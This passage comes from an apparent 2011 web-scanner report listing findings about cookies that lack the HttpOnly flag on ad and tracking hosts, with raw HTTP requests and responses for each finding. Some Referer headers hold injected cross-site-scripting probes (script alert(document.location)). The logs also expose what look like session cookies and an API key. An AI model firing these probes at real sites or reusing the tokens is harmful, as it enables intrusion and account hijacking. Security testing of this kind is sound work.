Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#
fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; ih="b!!!!<!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ve/>1!4j#(Ncl]A; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=$4^M3!4j#(oZ>LE

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:03:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!%=4X0s!#eCK!!!!%=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*
4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Wed, 11-Sep-2013 13:03:53 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 13:03:53 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

5.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

5.8. http://affiliates.lynda.com/42/510/50/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.lynda.com
Path:   /42/510/50/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /42/510/50/ HTTP/1.1
Host: affiliates.lynda.com
Proxy-Connection: keep-alive
Referer: http://drupalsn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Sep 2011 12:48:52 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_vtc=1c6d88f30e0ecdccd9fbf10eb320e373; expires=Wed, 12-Oct-2011 12:48:52 GMT; path=/
Location: http://files.lynda.com/files/lol_partners/art/lynda_bnr_180x150_growBrain.gif
X-Server-Name: www@dc1dtweb150
Content-Length: 0
Content-Type: image/gif


5.9. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


5.10. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

5.11. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


5.12. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5.13. http://btg.mtvnservices.com/aria/guid.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://btg.mtvnservices.com
Path:   /aria/guid.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aria/guid.html HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 466
Content-Type: text/javascript
Set-Cookie: aria_guid=1315831727-217; expires=Thu, 09 Sep 2021 12:48:47 GMT;path=/
ETag: "6fadfe0bc7ebeb328cca25f9535bd0f5:1296687166"
P3P: CP: IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT
Vary: Accept-Encoding
Cache-Control: max-age=4866
Date: Mon, 12 Sep 2011 12:48:47 GMT
Connection: close


                                   var guid_domain = location.hostname;
   var guid_domain_parts = guid_domain.split(".");
   if(guid_domain_parts.length>2)guid_domain = guid_domain_parts[guid_domain_parts.length-2]+"."+
...[SNIP]...

5.14. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

